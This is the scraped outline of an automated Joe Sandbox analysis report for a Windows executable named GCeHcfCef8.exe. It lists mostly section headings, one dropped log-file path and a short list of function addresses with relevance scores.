Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GCeHcfCef8.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
GCeHcfCef8.exe

Function 0BF3BDA8 Relevance: 1.8, APIs: 1, Instructions: 260
threadCOMMON

Function 0BF3C41D Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Function 0BF3C428 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 018DAD48 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Function 018D44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 018D590D Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Function 05694040 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON